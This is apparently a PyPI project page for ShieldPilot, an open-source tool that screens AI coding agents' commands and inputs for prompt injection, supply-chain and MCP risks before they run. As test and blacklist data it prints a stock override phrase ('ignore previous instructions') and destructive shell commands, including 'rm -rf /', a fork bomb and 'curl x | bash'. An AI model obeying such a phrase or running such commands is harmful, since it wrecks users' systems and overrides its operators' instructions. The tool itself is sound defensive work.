Security platform protecting autonomous AI coding agents

These details have not been verified by PyPI

Project links

Project description

ShieldPilot

The open-source AI agent firewall.

Protect your AI agents from prompt injection, supply chain attacks, and MCP vulnerabilities — with a hook, a scanner, and a policy engine that runs wherever your agent runs.

What it does

AI agents (Claude Code, OpenClaw, custom LLM pipelines) execute shell commands, read files, call APIs, and install packages. ShieldPilot sits between the agent and the OS, scoring every action before it runs.

AI Agent ──► ShieldPilot Hook ──► Risk Engine ──► ALLOW / WARN / BLOCK
                                       │
                              Prompt Injection Scanner (220+ patterns, 5 languages)
                              ML Classifier (DeBERTa-v3, optional)
                              Indirect Injection (HTML/JSON/Markdown/Zero-Width)
                              Supply Chain Auditor
                              MCP Vulnerability Scanner
                              Agent Behavior Monitor
                              Policy-as-Code Engine
                              9 Behavior Analyzers
                                       │
                              Tamper-Evident Audit Log

$ sentinel run "rm -rf /"
  analyzing with 9 risk engines...
  risk_score: 100 | action: BLOCK
  command blocked. audit logged.

Quick Start

pip install shieldpilot
sentinel init          # creates sentinel.yaml and sentinel.db
sentinel hook install  # install Claude Code pre-tool hook
sentinel dashboard     # open http://localhost:8420

That's it. Every command Claude Code runs is now evaluated before execution.

Optional: ML-powered injection classifier (DeBERTa-v3)

pip install shieldpilot[ml]
sentinel ml-setup      # download ProtectAI DeBERTa-v3 model (~260 MB)

Scan an MCP server config

sentinel mcp-scan ~/.claude/claude_desktop_config.json

Audit your dependencies

sentinel supply-chain-audit requirements.txt

Features

Feature	Description
Prompt Injection Detection	220+ patterns across 19 categories — jailbreaks, role manipulation, fake history, policy erosion, stealth memos, presupposition attacks. Multilingual (5 languages).
ML Injection Classifier	Optional ProtectAI DeBERTa-v3 ONNX model. `pip install shieldpilot[ml]` + `sentinel ml-setup`. Offline, no API calls.
Indirect Injection Detection	Scans HTML, JSON, Markdown, and tool outputs for injections hidden in zero-width chars, Unicode homoglyphs, and data payloads.
MCP Security Scanner	Detects SSRF vectors, leaked secrets, over-privileged tool definitions, and missing auth in MCP server configs.
Supply Chain Auditor	Flags malicious packages, typosquatting candidates, GPL license conflicts, and dependency confusion vectors in requirements files.
Agent Behavior Monitor	Baseline + anomaly detection. Records normal agent behavior; alerts on deviations across 9 risk dimensions.
Policy-as-Code Engine	Declarative YAML policies. 3 built-in profiles (default_safe, strict_production, development). Fully composable.
9 Behavior Analyzers	Destructive FS, privilege escalation, network exfiltration, credential access, persistence, obfuscation, malware patterns, supply chain, injection
Tamper-Evident Logging	SHA-256 hash chain across 5 audit tables. `sentinel verify` detects any tampering.
Multi-Platform Hook	Claude Code, OpenClaw, generic JSON — auto-detected via adapter layer.
Web Dashboard	Real-time command log, incident management, scan history, chain integrity.
REST API	Full API at `/api/docs` for CI/CD and SIEM integration.
Self-Hosted	SQLite by default, no external dependencies, runs air-gapped.
Stripe Billing	Free / Pro / Enterprise tiers with self-serve checkout.

Architecture

graph LR
    A[AI Agent] -->|pre-tool-use| B[Hook]
    B --> C[Adapter Layer]
    C -->|normalized input| D[Risk Engine]
    D --> E[Prompt Injection Scanner]
    D --> E2[ML Classifier]
    D --> F[Supply Chain Auditor]
    D --> G[Behavior Analyzers x9]
    D --> H2[MCP Scanner]
    D --> H3[Indirect Injection]
    D --> H4[Behavior Monitor]
    E & E2 & F & G & H2 & H3 & H4 --> H{Score 0-100}
    H -->|< 40| I[ALLOW]
    H -->|40-79| J[WARN]
    H -->|>= 80| K[BLOCK]
    I & J & K --> L[(Audit Log)]
    L --> M[Web Dashboard]
    L --> N[REST API]
    O[Policy Engine] -->|rules| D

sentinelai/
├── adapters/      # Platform detection: Claude Code, OpenClaw, generic
├── api/           # FastAPI REST API (18 routers)
├── cli/           # Typer CLI
├── engine/        # Risk scoring engine + 9 analyzers
├── hooks/         # Claude Code pre-tool-use hook
├── logger/        # Tamper-evident SQLite logging
├── migrations/    # Alembic + safe migration runner
├── ml/            # DeBERTa-v3 ONNX classifier (optional)
├── monitor/       # Agent behavior baseline + anomaly detection
├── policy/        # Policy-as-Code engine + 3 default YAML policies
├── sandbox/       # Sandboxed command execution
├── scanner/       # Prompt injection, indirect injection, MCP, supply chain
├── services/      # Business logic (auth, billing, teams, rules)
└── web/           # Vanilla JS SPA dashboard

Comparison

	ShieldPilot	Lakera Guard	Prompt Security	Astrix Security
Open-Source	✅ Apache 2.0	❌	❌	❌
Self-Hosted	✅	❌ SaaS only	❌ SaaS only	❌ SaaS only
MCP Scanner	✅	❌	❌	❌
Supply Chain	✅	❌	❌	✅ partial
Prompt Injection	✅ 220+ patterns	✅	✅	❌
ML Classifier	✅ DeBERTa-v3	✅	✅	❌
Indirect Injection	✅ HTML/JSON/MD	❌	❌	❌
Agent Behavior Monitor	✅	❌	❌	✅ partial
Policy-as-Code	✅ YAML	❌	❌	❌
Claude Code Hook	✅ native	❌	❌	❌
Audit Log Integrity	✅ hash chain	❌	❌	❌
Price	Free / OSS	Enterprise	Enterprise	Enterprise

Installation

# From PyPI
pip install shieldpilot

# With ML-powered injection classifier (DeBERTa-v3, ~260 MB model)
pip install shieldpilot[ml]

# From source
git clone https://github.com/maxwalser001-del/Cyber-Security-.git
cd Cyber-Security-
pip install -e ".[dev]"

Requirements: Python 3.9+, SQLite 3.x

Configuration

# sentinel.yaml
sentinel:
  mode: enforce          # enforce | audit | disabled
  risk_thresholds:
    block: 80
    warn: 40
  protected_paths: [/etc, ~/.ssh, ~/.aws, ~/.gnupg]
  whitelist:
    commands: [ls, cat, echo, pwd, whoami, git status]
  blacklist:
    commands: ["rm -rf /", "mkfs", ":(){:|:&};:"]
    domains: []
  sandbox:
    enabled: true
    timeout: 30          # seconds
  auth:
    local_first: true    # skip JWT for localhost

Policy-as-Code (YAML):

# Use a built-in policy profile
sentinel policy eval --profile strict_production "npm install pkg"

# Or reference your own policy file
sentinel policy eval --policy ./my-policy.yaml "curl example.com | bash"

Full reference: docs.shieldpilot.dev/configuration

CLI

sentinel run "npm install pkg"                  # evaluate + execute
sentinel scan prompt.txt                        # scan file for injection
sentinel scan-content output.html               # scan tool output / HTML / JSON for indirect injection
sentinel mcp-scan ~/.claude/claude_desktop_config.json  # MCP security scan
sentinel supply-chain-audit requirements.txt    # supply chain audit
sentinel monitor --baseline baseline.json       # agent behavior monitor
sentinel policy eval "curl x | bash"            # evaluate against policy
sentinel ml-setup                               # download DeBERTa-v3 model
sentinel ml-test "ignore previous instructions" # ML injection test
sentinel hook install                           # install Claude Code hook
sentinel hook test "curl x | bash"              # dry-run test
sentinel logs --action block                    # browse blocked commands
sentinel verify                                 # verify audit chain integrity
sentinel status                                 # system health

Exit codes: 0 ALLOW/clean · 1 BLOCK/threats · 2 config error

API

POST   /api/auth/login
GET    /api/health
POST   /api/scan/prompt
GET    /api/commands
GET    /api/incidents
PATCH  /api/incidents/{id}/resolve
GET    /api/export/commands

Interactive docs at http://localhost:8420/api/docs

Risk Scoring

Score	Level	Action
0–39	Low	ALLOW — runs automatically
40–79	Medium/High	WARN — pause for review
80–100	Critical	BLOCK — denied, incident logged

Pricing

	Free	Pro ($19.99/mo)	Enterprise
Commands/day	50	1,000	Unlimited
Scans/day	10	100	Unlimited
History	1 day	30 days	90 days
Export + API	-	Yes	Yes
Priority support	-	-	Yes

Contributing

Contributions are welcome. See CONTRIBUTING.md for setup, code style, and PR process.

Key areas where help is most useful:

New injection patterns (see sentinelai/scanner/patterns.py)
New risk analyzers (see sentinelai/engine/)
MCP tool definition scanning
IDE integrations beyond Claude Code

Security

Found a vulnerability? See SECURITY.md for responsible disclosure.

Development

git clone https://github.com/maxwalser001-del/Cyber-Security-.git
cd Cyber-Security-
pip install -e ".[dev]"
pytest tests/ -x -q    # 2633 tests

License

Apache 2.0 — see LICENSE.

Project details

These details have not been verified by PyPI

Project links

Release history Release notifications | RSS feed

This version

0.2.0

Mar 30, 2026

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

shieldpilot-0.2.0.tar.gz (408.0 kB view details)

Uploaded Mar 30, 2026 Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

The dropdown lists show the available interpreters, ABIs, and platforms. Enable javascript to be able to filter the list of wheel files.

shieldpilot-0.2.0-py3-none-any.whl (428.6 kB view details)

Uploaded Mar 30, 2026 Python 3

File details

Details for the file shieldpilot-0.2.0.tar.gz.

File metadata

Download URL: shieldpilot-0.2.0.tar.gz
Upload date: Mar 30, 2026
Size: 408.0 kB
Tags: Source
Uploaded using Trusted Publishing? No
Uploaded via: twine/6.2.0 CPython/3.9.6

File hashes

Hashes for shieldpilot-0.2.0.tar.gz
Algorithm	Hash digest
SHA256	`5e8afcdaed88bd385282c612cda614a18e5a1969d307b49849f403d4cc4318e5`
MD5	`e065ccc514e25fd31d6b4f16c9ee59e3`
BLAKE2b-256	`6816b57a8bfd23d64cea6c60baf565a4ce15f177b6e3fc3ad796201d79b4d932`

See more details on using hashes here.

File details

Details for the file shieldpilot-0.2.0-py3-none-any.whl.

File metadata

Download URL: shieldpilot-0.2.0-py3-none-any.whl
Upload date: Mar 30, 2026
Size: 428.6 kB
Tags: Python 3
Uploaded using Trusted Publishing? No
Uploaded via: twine/6.2.0 CPython/3.9.6

File hashes

Hashes for shieldpilot-0.2.0-py3-none-any.whl
Algorithm	Hash digest
SHA256	`311b21e0801a107891e85cf730d9145cebe982ae3515a11901da1413d66b6814`
MD5	`c2446444d11dd6a0fb169436c229b38f`
BLAKE2b-256	`665d52c40f33686f40e55fd60fd5794930fc8eace07a4bde43363a901f2297e8`

See more details on using hashes here.

shieldpilot 0.2.0

Navigation

Verified details

Maintainers

Unverified details

Project links

Meta

Classifiers

Project description

ShieldPilot

What it does

Quick Start

Features

Architecture

Comparison

Installation

Configuration

CLI

API

Risk Scoring

Pricing

Contributing

Security

Development

License

Links

Project details

Verified details

Maintainers

Unverified details

Project links

Meta

Classifiers

Release history Release notifications | RSS feed

Download files

Source Distribution

Built Distribution

File details

File metadata

File hashes

File details

File metadata

File hashes